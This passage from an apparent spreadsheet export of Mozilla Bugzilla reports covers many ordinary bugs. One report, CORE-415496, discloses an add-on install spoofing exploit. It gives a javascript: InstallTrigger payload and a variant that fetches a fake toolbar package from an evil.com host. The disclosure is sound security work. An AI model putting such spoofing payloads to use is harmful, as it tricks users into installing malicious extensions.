Create script that makes rename.. and alter table commands to run against live remora database
Reproducible: Always</t>
  </si>
  <si>
    <t>expatrick</t>
  </si>
  <si>
    <t>CALENDAR-167798</t>
  </si>
  <si>
    <t>[RFE] Clicking on a (webcal) url that's already in Calendar should open calendar not add it again</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) add a webcal url to Calendar from: 
http://www.apple.com/ical/library/holidays.html
2) Go back and click on the same url
3) Expected result: open/ focus to Calendar but do not add it again.
If that calendar is unchecked active it.</t>
  </si>
  <si>
    <t>ajbu</t>
  </si>
  <si>
    <t>CORE-415496</t>
  </si>
  <si>
    <t>bad userpass URL parsing leads to addon install spoofing</t>
  </si>
  <si>
    <t>This is an alternate exploit for the nsStandardURL User:pass parsing bug described in bug 415034 and 415401. The fix will be the same but it's a completely unrelated testcase/exploit.
1) load https://addons.mozilla.org  (because it's whitelisted)
2) enter the URI
javascript:InstallTrigger.install({test:https://:foo@addons.mozilla.org/some/path})void(0)
An install confirmation dialog comes up. Due to this bug it shows the test package as coming from https://s.mozilla.org/some/path/. (Note: any actual install will fail as it's a fake path that's besides the point for this test). It looks like this is just a display URI so if it had been a real path the install would still work -- in other words you could
To exploit this the trigger would have to be run on a whitelisted site or convince the user to paste the URL into the addressbar and not notice the evil site. You can't prevent the install confirmation dialog from coming up but if you can convince the user that the content comes from a good source that's just as good right? What about sourcing the package from
url = http://:xxxxxxx@evil.com/toolbar.google.com/path/gtoolbar.xpi
InstallTrigger.install({Google Toolbar: url})</t>
  </si>
  <si>
    <t>TOOLKIT-428862</t>
  </si>
  <si>
    <t>Updating a disabled extension then enabling without restart negates the update</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008041206 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008041206 Minefield/3.0pre
I've got Firebug 1.1b10 installed but disabled. I've installed 1.1b12 (through the getfirebug.com site) then enabled it. Then restarted Firefox. The Firebug extension got enabled but it's version was 1.1b10.
Reproducible: Didn't try
Steps to Reproduce:
1. Install an extension (that has an update available)
2. Disable that extension
3. Restart Firefox
4. Install the update for that extension but don't restart Firefox
5. Enable the extension
6. Restart Firefox
Haven't tried to reproduce the bug but seeing the other Extension manager related ones I think this isn't just a one-time hickup.</t>
  </si>
  <si>
    <t>pasthelod</t>
  </si>
  <si>
    <t>BUGZILLA-473646</t>
  </si>
  <si>
    <t>WebService</t>
  </si>
  <si>
    <t>WebService methods should check list parameters for scalars and convert before use</t>
  </si>
  <si>
    <t>When a WebService method is expecting a list reference as one of the parameters passed in but the param is a scalar an error occurs when the method tries to access the parameter.
One example would be retrieving a bug using Bug.get if you pass a single bug id as a scalar for the 'ids' param when it is expecting a list you get the following error to the client:
Can't use string (1) as an ARRAY ref while strict refs in use at /var/www/html/bugzilla/Bugzilla/WebService/Bug.pm line 151
All WebService methods should either automatically convert a single value to a list before trying to access as list or throw error to the client stating that it only accepts values in the form of lists. These instead of throwing a code
error.
I believe it should automatically convert the values to lists and then just do the right thing. What do others think?
Will work out a patch to attach soon.
Dave</t>
  </si>
  <si>
    <t>dkl</t>
  </si>
  <si>
    <t>CORE-296018</t>
  </si>
  <si>
    <t>Images in SVG fail to display when image elements replaced using replaceChild</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050510 Firefox/1.0+
I have an XHTML page with SVG in it which contains a group of image elements.
Via JavaScript a user action triggers an XmlHttpRequest request to a server 
which returns a new group of image elements to be displayed (they are all 
JPEGs).
The result of the request is an SVG document.  The javascript grabs the new 
group of image elements and replaces the existing images group in the DOM 
using replaceChild.
The new image elements appear in the DOM (using DOM Inspector) and I can right 
click on them and see the JPEG's details - but they won't display.  This is 
irrespective of whether I use suspend/unsuspenRedraw or forceRedraw.
See the additional information for the code and sample SVG.
Reproducible: Always
Steps to Reproduce:
1. Using Javascript - send XmlHttpRequest for new group of SVG image elements
2. Convert result into XML node
3. Replace existing image group with new one
Actual Results:  
New images should be displayed on screen
Expected Results:  
New image did not display but were loaded successfully into the DOM
The original doc: 
&lt;!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVGÂ­
/1.1/DTD/svg11.dtd&gt; 
&lt;html xmlns=http://www.w3.org/1999/xhtml 
xmlns:xlink=http://www.w3.org/1999/xlinkxmlns:svg=http://www.w3.org/2000/svg
&gt; 
                Hugle Maps 
                &lt;script type=text/javascript language=JavaScript 
src=MapVisualization.js /&gt; 
                &lt;svg:svg version=1.1 width=100% height=100% 
preserveAspectRatio=xMidYMid meet zoomAndPan=disable&gt; 
A sample response for a image update: 
&lt;svg:svg 
xmlns:svg=http://www.w3.org/2000/svgxmlns:xlink=http://www.w3.org/1999/xlink
&gt; 
                &lt;svg:image x=37 y=227 xlink:href=Images/ecw/9/0/3-4Â­.jpg 
width=125 height=125 /&gt; 
And lastly here is all the code to request the new images and add them 
the SVG DOM: 
        function loadXMLDoc(url) 
        { 
                //Using Mozilla XMLHttpRequest or MSXML for IE 
                if (window.XMLHttpRequest) { 
                        req = new XMLHttpRequest() 
                        req.overrideMimeType(text/xmlÂ­) 
                        req.onreadystatechange = processReqChange 
                        req.open(GET url true) 
                        req.setRequestHeader(Content-Â­Encoding UTF-8) 
                        req.send(null) 
                } else if (window.ActiveXObject) { 
                        req = new ActiveXObject(Microsoft.XMLHTÂ­TP) 
                        if (req) { 
                                req.onreadystatechange = processReqChange 
                                req.open(GET url true) 
                                req.setRequestHeader(Content-Â­
Type text/xml) 
                                req.setRequestHeader(Content-Â­Encoding UTF-
8) 
                                req.send() 
                        } 
                } 
        } 
        function processReqChange() 
        { 
                // only if req shows complete 
                if (req.readyState == 4) { 
                        // only if OK 
                        if (req.status == 200) { 
                                var newSvg = req.responseXML.documentElemenÂ­t 
                                replaceImage(newSvg.firstChildÂ­) 
                        } else { 
                                alert(There was a problem retrieving the XML 
data:\n + req.statusText) 
                        } 
                } 
        } 
        function replaceImage(svgNode) 
        { 
                var map = document.getElementById(map)Â­ 
                var svgElement = map.ownerSVGElement 
                var oldImages = document.getElementById(imageÂ­s) 
                var token = svgElement.suspendRedraw(0) 
                map.replaceChild(svgNode oldImages) 
                svgElement.unsuspendRedraw(tokÂ­en) 
                svgElement.forceRedraw() 
        }</t>
  </si>
  <si>
    <t>hugh.saalmans</t>
  </si>
  <si>
    <t>FIREFOX-234048</t>
  </si>
  <si>
    <t>Find in this page the message box that pops up stating 'the text you entered was not found' blocks the Find box.</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
When opening the find dialog (Edit &gt; Find in this page) if the text entered is
not found the message box / popup appears in the way of the Find dialog. This
is annoying having to press OK every time if you have a large text document that
you want to search for various words / strings.
I think a better solution would be for the 'Find in this Page' dialog to expand
down with a fieldset called 'messages' which would display 'The text you
entered was not found'. Then you can choose to 'hide' the expanded section or
you could just type something else in and try again. Once you start to type
again the message would disappear. This is hard to explain I will try and
create an image of what I mean and attach it.
Reproducible: Always
Steps to Reproduce:
1. Visit www.google.com
2. Go to 'Edit &gt; Find in this Page'
3. In the 'Find What:' textbox enter a string of text that isn't on the google
front-page such as 'hajhfahdjfajdhf jhjshdjfhue' and hit enter.
Actual Results:  
A message box popped up informing me that 'The Text you entered was not found'
Expected Results:  
The 'Find in this page' dialog should expand downwards showing a 'messages'
fieldset which can display various messages. The main 'Find in this Page'
dialog should have a  button for the 'Messages' expand-out area.</t>
  </si>
  <si>
    <t>richard.corbin</t>
  </si>
  <si>
    <t>NSS-63233</t>
  </si>
  <si>
    <t>No QA report (.nssqa) 2000</t>
  </si>
  <si>
    <t>First part is done then after
NSS has been initialized.
Got default certdb
Encrypted-Data message Passed
Running Z:/environ.ksh
RSAPERF: WINNT4.0_DBG.OBJD 300 iterations in 8.328 s one operation every 27760 us
it stops. NT creates the .nssqa file (ends with starting of all.sh for DBG)
2000 doesnt even do this</t>
  </si>
  <si>
    <t>BUGZILLA-28398</t>
  </si>
  <si>
    <t>Gotta be more careful when emailing state changes of dependent bugs.</t>
  </si>
  <si>
    <t>The below entertaining mail was generated.  I think what is happening (haven't
looked at the code yet) is when bug B is changed to be dependent on bug A then
you get notified of all changes to bug A's state that happened ever since you
last generated email diffs for bug *B*.  This is not particularly useful.
Date: Thu 17 Feb 2000 17:47:16 -0800 (PST)
From: bugzilla-daemon@mozilla.org
To: pavlov@netscape.com
Subject: [Bug 24890] Changed - Cannot dismiss sub-dialogs brought up from prefs
panel
	(text/plain)
http://bugzilla.mozilla.org/show_bug.cgi?id=24890
sairuh@netscape.com changed:
           What    |Old Value                   |New Value
----------------------------------------------------------------------------
  BugsThisDependsOn|                            |2808328177
This bug depends on bug 28177 which changed state:
           What    |Old Value                   |New Value
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME
             Status|RESOLVED                    |REOPENED
         Resolution|WORKSFORME                  |
             Status|REOPENED                    |NEW
             Status|NEW                         |ASSIGNED
             Status|ASSIGNED                    |RESOLVED
         Resolution|                            |FIXED
------- Additional Comments From sairuh@netscape.com  2000-02-17 17:47 -------
verif blocked by bugs 28177 and 28083.</t>
  </si>
  <si>
    <t>batosti</t>
  </si>
  <si>
    <t>CORE-78822</t>
  </si>
  <si>
    <t>add bidi support to makefile.win</t>
  </si>
  <si>
    <t>before we can turn on the --enable-bidi switch we need to modify 
a few makefiles
Erik can you point us to the list?</t>
  </si>
  <si>
    <t>tetsuroy</t>
  </si>
  <si>
    <t>bstell</t>
  </si>
  <si>
    <t>TOOLKIT-985655</t>
  </si>
  <si>
    <t>Async Tooling</t>
  </si>
  <si>
    <t>[AsyncShutdown] Ensure that Sqlite.jsm doesn't shutdown before its clients</t>
  </si>
  <si>
    <t>I think it's worth to evaluate moving Sqlite.jsm shutdown later mostly cause it's very common for consumers to use profile-before-change for shutdown work but if they do:
- Sqlite.jsm will try to open a connection and fail doing so cause AsyncShutdown.profileBeforeChange.addBlocker will throw
- they may not notice it didn't work as expected
- basically they are only left with profile-change-teardown that's not enough for complex shutdown processes
There should be no downside moving to profile-before-change2 and that would allow consumers to use profileChangeTeardown and profileBeforeChange for enqueued shutdown work.</t>
  </si>
  <si>
    <t>dteller</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-320596</t>
  </si>
  <si>
    <t>sk / Slovak</t>
  </si>
  <si>
    <t>tb 1.5 sk trademarks review</t>
  </si>
  <si>
    <t>start.dtd has
startpage.helpURL linking to http://thunderbird.czilla.cz but that should
be a redirect on mozilla-world.org see 
http://wiki.mozilla.org/L10n:Thunderbird_Trademark_Review.
Please attach a patch and request approval-l10n and give the requested redirect
in a bug comment so that we can add that.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-445222</t>
  </si>
  <si>
    <t>App doesn't load on Linux if trayicon is used</t>
  </si>
  <si>
    <t>The code assumes that the desktop environment binary component exists and fails otherwise. This prevents the app from loading at all so it just hangs on the empty page (or splash screen if any).</t>
  </si>
  <si>
    <t>FIREFOX-322814</t>
  </si>
  <si>
    <t>Firefox ignores the AXPress action</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060108 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060108 Firefox/1.6a1
Firefox on OS X does not respond correctly to the AXPress action. This can be verified directly using the Accessibility Inspector from the Apple develop tools to inspect the close button of a Firefox window.
This is a failure of Firefox 1.5 to integrate itself with the OS X accessibility framework. It will break tools that depend on that framework in order to close Firefox windows. For instance it breaks Witch preference pane app which cannot close a firefox window.  It probably also breaks parts of the routine OS X accessibility support.
Reproducible: Always
Steps to Reproduce:
1. Start Firefox and open a secondary window
2. Start the Apple Accessibility Inspector and inspect (lock on) the window's close button
3. Try to close the window by performing the AXPress action.
Actual Results:  
The window does not close.
Expected Results:  
The window should close.
I have hosted a tiff image which is a screenshot of the problem at http://www.alexisgallagher.com/firefoxbug/screenshot.tiff</t>
  </si>
  <si>
    <t>hwaara</t>
  </si>
  <si>
    <t>BUGZILLA-344298</t>
  </si>
  <si>
    <t>Bug Import/Export &amp; Moving</t>
  </si>
  <si>
    <t>importxml.pl performance problem</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
The importxml.pl script takes an extremely long time (half an hour or more) to process an XML file if it contains large (several MB) attachments.
I will attach a workaround for this problem.
Reproducible: Always
Steps to Reproduce:
1.Use importxml.pl to import a file that contains a 5MB attachment.
2.
3.
Actual Results:  
It takes over half an hour on a reasonably modern Pentium 4.
Expected Results:  
It should take less time. :-)</t>
  </si>
  <si>
    <t>vrb</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-704376</t>
  </si>
  <si>
    <t>Refund IPNs</t>
  </si>
  <si>
    <t>Aren't what I expected. It comes in as this:
Nov 21 17:12:08 dev1.addons.phx1.mozilla.com: [][173.0.82.126] z.paypal:INFO IPN received: transaction%5B0%5D.refund_id=5R2127863K612604J&amp;payment_request_date=Mon+Nov+21+15%3A23%3A02+PST+2011&amp;return_url=https%3A//apps-preview-dev.allizom.org/en-US/apps/app/sinuous/purchase/complete%3Frealurl%3DNone%26uuid%3D79d12bb795f51076fdabc4469fa63c27&amp;fees_payer=EACHRECEIVER&amp;ipn_notification_url=https%3A//apps-preview-dev.allizom.org/services/paypal&amp;sender_email=andy_1314044418_per%40gmail.com&amp;verify_sign=AZaEavLPR5zSUXtRTTmChFWQGo0KA1HSqQzztoRbzzNCBM5AgDdhqD3c&amp;test_ipn=1&amp;transaction%5B0%5D.id_for_sender_txn=4LF75010405294253&amp;transaction%5B0%5D.receiver=test-2_1296594913_per%40gmail.com&amp;cancel_url=https%3A//apps-preview-dev.allizom.org/en-US/apps/app/sinuous/purchase/cancel%3Frealurl%3DNone%26uuid%3D79d12bb795f51076fdabc4469fa63c27&amp;transaction%5B0%5D.is_primary_receiver=false&amp;reason_code=Refund&amp;pay_key=AP-65Y74544U7005101H&amp;action_type=PAY&amp;transaction%5B0%5D.id=6V9417167P586054V&amp;memo=Purchase+of+Sinuous&amp;transaction%5B0%5D.refund_account_charged=test-2_1296594913_per%40gmail.com&amp;transaction%5B0%5D.refund_amount=USD+0.01&amp;transaction%5B0%5D.status=Refunded&amp;transaction%5B0%5D.paymentType=DIGITALGOODS&amp;transaction%5B0%5D.status_for_sender_txn=Refunded&amp;transaction%5B0%5D.pending_reason=NONE&amp;transaction_type=Adjustment&amp;tracking_id=79d12bb795f51076fdabc4469fa63c27&amp;transaction%5B0%5D.amount=USD+0.01&amp;status=COMPLETED&amp;log_default_shipping_address_in_transaction=false&amp;charset=windows-1252&amp;notify_version=UNVERSIONED&amp;reverse_all_parallel_payments_on_error=false :/data/www/apps-preview-dev.allizom.org/zamboni/apps/paypal/views.py:69
That's the IPN from PayPal that someone refunded in the PayPal API. The kicker is that the status is COMPLETED. Which is not what hte other bits said.
So we'll have to figure out what to do with the above to process the refund correctly.</t>
  </si>
  <si>
    <t>andy+bugzilla</t>
  </si>
  <si>
    <t>CORE-120274</t>
  </si>
  <si>
    <t>Crash Mozilla on Bugzilla-jp.</t>
  </si>
  <si>
    <t>BuildID: 20020111032002011403 and 2002011503(Windows2000).
When this URL loaded Mozilla crashed.
But 2002011003 is not reproduced.
Talkback ID is...
TB1699605E
TB1699577G
TB1699571M
This URL is Japanese Bugzilla in Mozillagumi....</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-277783</t>
  </si>
  <si>
    <t>Firefox Software Update RDF fi-FI</t>
  </si>
  <si>
    <t>Following this post is attached the fi-FI.rdf for Firefox as suggested in bug 260842</t>
  </si>
  <si>
    <t>ville.pohjanheimo</t>
  </si>
  <si>
    <t>SEAMONKEY-365049</t>
  </si>
  <si>
    <t>Clean up logic for scrolling and selecting when entering folder</t>
  </si>
  <si>
    <t>When entering a folder it's not always very clear for human beings which message - if any - will be selected and where the threadpane will be scrolled to despite a UI pref remember the last selected folder (mailnews.remember_selected_message) and a hidden pref (mailnews.scroll_to_new_message).
With the default pref settings (both prefs default to 'true') entering a folder with new messages (eg. a newsgroup) will _scroll_ to the first (= usually the oldest!) new message probably opening the repective thread but not selecting any message regardless of the remember_selected_message setting! (See also TB's bug 273693).
Only if no new messages exist the last selected message will be selected.
With scroll_to_new_message set to false message selection doesn't happen at all...
Relevant code: msgMail3PaneWindow.js ll.117+ ll.181+.</t>
  </si>
  <si>
    <t>mnyromyr</t>
  </si>
  <si>
    <t>BUGZILLA-312439</t>
  </si>
  <si>
    <t>The user being impersonated has moral rights to keep informed</t>
  </si>
  <si>
    <t>From userprefs.cgi you can see who is watching you (great!). But when someone
is impersonating your account you aren't notified!
As a user and because impersonating another user's account is much severe than
watching it I do want to keep informed (mainly by email) when someone has
started using my account. I want to know who and when. And again I want to know
when the user stopped using my account.
Morally and legally not only the impersonated user should be kept informed as
soon as possible but this should also be logged and viewable from the
editusers.cgi page for instance to prove that joel didn't clear the security
flag on the most critical bug of the year but that I did (using his account)
for some unknwown reasons. And please don't tell me that only trustable users
can or should be able to impersonate others user account and that consequently
this doesn't need to be logged. )
Oh... and as a second part of this bug relogin.cgi should also ask for the
reason a user tries to impersonate someone else's account. This message could
then be added to the email sent to the impersonated user as well as added in the
log file:
On Friday October 14 2005 14:22:37 FrÃ©dÃ©ric Buclin  has
impersonated Joel Peshkin's account  for the following
reasons:
Joel is on vacation and asked me to change his email notification prefs to stop
watching wicked who is definitely too active these days and generates a lot of
bugspam :)</t>
  </si>
  <si>
    <t>NSS-39794</t>
  </si>
  <si>
    <t>certutil and tokens</t>
  </si>
  <si>
    <t>certutil is not listing keys at all and not listing certs on tokens.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-318146</t>
  </si>
  <si>
    <t>OS Integration</t>
  </si>
  <si>
    <t>Saved HTTP auth password in keychain not used when Allow saving in Keychain unchecked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051107 Camino/1.0b1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051107 Camino/1.0b1
This is related to bug 187720 but it seemed sufficiantly different that it should have its own bug.  Basically the problem is that if you have allow saving in the keychain disabled in the preferences the dialog for supplying HTTP authorization still gives a store password in keychain option.  If you check that option you might be surprised when you next go to that page only to discover that your password is not in fact saved.
Reproducible: Always
Steps to Reproduce:
1.  Disable save passoword in keychain
2.  Login to a page that uses HTTP AUTH check store password in keychain in the dialog
3.  Quit your browser and go back to the page.
Actual Results:  
Password isn't saved.
Expected Results:  
Password should be saved or the save password in keychain checkbox shouldn't be there or it should give you a warning when you try to use it.</t>
  </si>
  <si>
    <t>theseum</t>
  </si>
  <si>
    <t>SEAMONKEY-198898</t>
  </si>
  <si>
    <t>Rename Time Remaining to Time Left in Download Manager</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030323
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030323
Download Manager says Time Remaining.
Download Dialog says Time Left.
Advantage of this is that it'll reduce Download Manager's window size.
This is not bug 134157
134157 is about the 2 having different speeds and info.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>Lil46john</t>
  </si>
  <si>
    <t>SEAMONKEY-237331</t>
  </si>
  <si>
    <t>Firefox Help Contents still says Mozilla Firebird in 2 places</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040312 Freebird/0.8.0+ (Krueger)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US ) Gecko/20040312 
In Firefox if you select Help --&gt; Help Contents the second entry of the
Contents menu is Using Mozilla Firebird and the next to last entry is Mozilla
Firebird Reference Menu
Reproducible: Always
Steps to Reproduce:
1.Select Help
2. Select Help Contents
3.
Expected Results:  
Should Say Mozilaa Firefox</t>
  </si>
  <si>
    <t>KirbyFCF2</t>
  </si>
  <si>
    <t>TOOLKIT-391731</t>
  </si>
  <si>
    <t>[meta] Plugin blocklisting</t>
  </si>
  <si>
    <t>Tracking bug for plugin blocklisting issues</t>
  </si>
  <si>
    <t>CORE-418958</t>
  </si>
  <si>
    <t>Enable Go Daddy root CA certificates for EV use</t>
  </si>
  <si>
    <t>Per bug 403437 I've approved enabling Go Daddy's existing root CA certificates
for Extended Validation use with EV policy OIDs as follows:
Valicert Class 2 Policy Validation Authority
2.16.840.1.114413.1.7.23.3 *and* 2.16.840.1.114414.1.7.23.3
Go Daddy Class 2 CA
2.16.840.1.114413.1.7.23.3
Starfield Class 2 CA
2.16.840.1.114414.1.7.23.3
Thanks in advance for your help getting this change made to PSM!</t>
  </si>
  <si>
    <t>MOZILLA.ORG-332018</t>
  </si>
  <si>
    <t>mozilla.test.multimedia has disappeared</t>
  </si>
  <si>
    <t>mozilla.test.multimedia just showed up as deleted on news.mozilla.org.
I've opened a ticket with Giganews.</t>
  </si>
  <si>
    <t>FIREFOX-422161</t>
  </si>
  <si>
    <t>Fix JS strict error in *.jsm</t>
  </si>
  <si>
    <t>With strict error checking enabled JSON.jsm has the following error:
undefined variable: EXPORTED SYMBOLS</t>
  </si>
  <si>
    <t>CORE-444691</t>
  </si>
  <si>
    <t>scrollframes should call superclass InvalidateInternal</t>
  </si>
  <si>
    <t>Created attachment 329012
fix
We want to add hooks to nsFrame::InvalidateInternal so that the invalidation area can be transformed or the damage propagated to other elements that are observing the frame's rendering. But currently scrollframes don't call the superclass InvalidateInternal. That's easy to fix.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-191374</t>
  </si>
  <si>
    <t>Danish</t>
  </si>
  <si>
    <t>hedeselskabet.dk - [TOOL][Web500 CMS]</t>
  </si>
  <si>
    <t>uses old version</t>
  </si>
  <si>
    <t>CALENDAR-364841</t>
  </si>
  <si>
    <t>Unify ics provider serialization and parsing with the ics import/export code</t>
  </si>
  <si>
    <t>There are currently two copies of the code to serialize and parse ics data. One in the ics provider and one in the ics import/export. That's silly and causes double work.</t>
  </si>
  <si>
    <t>CORE-430056</t>
  </si>
  <si>
    <t>Camino trunk (and Minefield) Breaks my Wiki Sidebar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.8.1.14) Gecko/20080409 Camino/1.6 (like Firefox/2.0.0.14)
Camino 1.6 Safari Firefox and IE (for Windows) all display my Mediawiki Sidebar the way it should be but the nightly for Camino breaks it.
Reproducible: Always
Steps to Reproduce:
1. Head over to http://daniel.cook.name/index.php?title=Main_Page</t>
  </si>
  <si>
    <t>dlcook0421</t>
  </si>
  <si>
    <t>THUNDERBIRD-307999</t>
  </si>
  <si>
    <t>The width of the font panel is short on OS X and GNOME.</t>
  </si>
  <si>
    <t>screen shot:
https://bugzilla.mozilla.org/attachment.cgi?id=195617
Mac OS X 10.3.9
Tb version 1.5 Beta 1 (20050908)</t>
  </si>
  <si>
    <t>sugar.waffle</t>
  </si>
  <si>
    <t>CORE-426766</t>
  </si>
  <si>
    <t>Selection</t>
  </si>
  <si>
    <t>Cursor keys behave weirdly in view source window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-GB rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-GB rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
See STR.
Reproducible: Always
Steps to Reproduce:
1. Open View Source for any webpage. You get the View Source window with the blinking cursor at the beginning of the HTML text.
ALTERNATIVE #1:
2. While the cursor is visible press End.
ALTERNATIVE #2:
2. Press Home and End alternatingly very quickly.
Actual Results:  
IN ALTERNATIVE #1: Cursor moves down one line stays there for the duration of one blinking interval then moves to the expected position.
IN ALTERNATIVE #2: Cursor moves back and forth between beginning of first line and beginning of second line.
Expected Results:  
IN ALTERNATIVE #1: Cursor moves to end of line.
IN ALTERNATIVE #2: Cursor moves back and forth between beginning and end of first line.
The same happens anywhere else in the source not just at the beginning.</t>
  </si>
  <si>
    <t>timwi</t>
  </si>
  <si>
    <t>CORE-45533</t>
  </si>
  <si>
    <t>Widgets visually depress/respond/react on right click</t>
  </si>
  <si>
    <t>Right clicking on most widgets either makes them respond or react (i.e. buttons 
depress visually but onclick doesn't really fire).  I don't see why this is 
the case and it feels a little sloppy (what's the purpose of having them 
visually respond if they aren't actually functioning?)
This has been the case for as long as I remember and while I assume it's 
known I just wanted to ensure that it's out there...</t>
  </si>
  <si>
    <t>CORE-502937</t>
  </si>
  <si>
    <t>Consider doing lazy frame construction</t>
  </si>
  <si>
    <t>Webkit does it they needed it for the Acid3 perf thing.  And it shows up in lots of other benchmarks too... And maybe even in some real-life web pages.</t>
  </si>
  <si>
    <t>CORE-340508</t>
  </si>
  <si>
    <t>Installation of Dutch Dictionary does not work although I get Succesfully Installed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 nl rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Versie 1.5.0.4 (20060516) [Dutch Version]
I'm unable to install the Dutch Dictionary. When I download and install spell-nl.xpi I get a pop-up: Succesfully Installed but when I look into the Spelling Checker I only see the Enlgish/US (default). 
I get the same result when I try to install the Italian Dictionary.
Reproducible: Always
Steps to Reproduce:
1. Create a new message in the mail client.
2. Go to the spelling checker and in the bottom left corner go to: Language and select 'download more'
3. Select Dutch
4. Install now
5. Close Extension box (spell checker is disappeared from this box)
6. Close Thunderbird.
7. Open Thunderbird and try again.
Actual Results:  
I'm unable to choose the Dutch dictionary.
Expected Results:  
Add the Dutch dictionary to the list.
I have Thunderbird running on a Windows 2003 Terminal Server. I tried to install the dictionary with an administrative account.</t>
  </si>
  <si>
    <t>yhaast</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-428920</t>
  </si>
  <si>
    <t>regexp parser doesn't recognize / in character class</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: 
this code:
var foo = /[/]/
is parsed correctly by SpiderMonkey and IE.  Rhino thinks the slash in the char-class terminates the regexp.
Reproducible: Always
Steps to Reproduce:
1. start the rhino console
2. type:  var foo = /[/]/
3. hit Enter
Actual Results:  
 line 16: missing  before statement
js: var foo = /[/]/
js: .............^
Expected Results:  
should produce no output and evaluating foo should show:
/[/]/
TokenStream#readRegExp(int) is going to have to change to keep track of whether it's inside a character class.</t>
  </si>
  <si>
    <t>steve.yegge</t>
  </si>
  <si>
    <t>CORE-507067</t>
  </si>
  <si>
    <t>SVG: GetAnimVal / GetBaseVal is wrong for em/ex units in display:none</t>
  </si>
  <si>
    <t>Created attachment 391255
Test case to demonstrate problem
SVG 1.1 section 4.3 describes the 'value' member of an SVGLength as:
&gt; The value as an floating point value in user units.
Currently in our implementation when an SVGAnimatedLength is animated the value attribute is not in user units but in the specified units.
The attached testcase passes on Opera 10b2. We fail because we seem to return values in em's rather than user units.</t>
  </si>
  <si>
    <t>NSS-63328</t>
  </si>
  <si>
    <t>when no certificate gets created stress test hangs forever</t>
  </si>
  <si>
    <t>a problem with the certutil on linux caused no certificate to be generated -
instead of failing the stresstest never returned</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-413032</t>
  </si>
  <si>
    <t>Add Camino 1.6b2 to bouncer</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #412678 +++
We're doing an emergency Camino 1.6b2 release to pick up the fix for bug 412701 a serious crasher.  We'd like for this release to be added to bouncer.
Camino 1.6b2 en-US is http://ftp.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-1.6b2.dmg .
There is no multilingual version for this release.</t>
  </si>
  <si>
    <t>TOOLKIT-513710</t>
  </si>
  <si>
    <t>Places toolkit JS should use XPCOMUtils.defineLazy[Service]Getter</t>
  </si>
  <si>
    <t>CALENDAR-338167</t>
  </si>
  <si>
    <t>Localizability issues with recurNthWeek and recurLast in dateFormat.properties</t>
  </si>
  <si>
    <t>The way recurNthWeek and recurLast messages are constructed is troublesome for languages where grammatical gender of weekday names is varied.
For example in Polish (with diacritics removed since UTF8 at Bugzilla sucks):
Monday is poniedzialek - grammatical gender: masculine
Sunday is niedziela - grammatical gender: feminine
Also for different grammatical genders adjectives like Last and numerals like First or Third are varied for different genders:
First Monday - pierwsz_y_ poniedzialek
First Sunday - pierwsz_a_ niedziela
Last Monday - ostatni poniedzialek
Last Sunday - ostatni_a_ niedziela
So when messages are constructed like this:
recurNthWeek=%1$S %2$S of the month
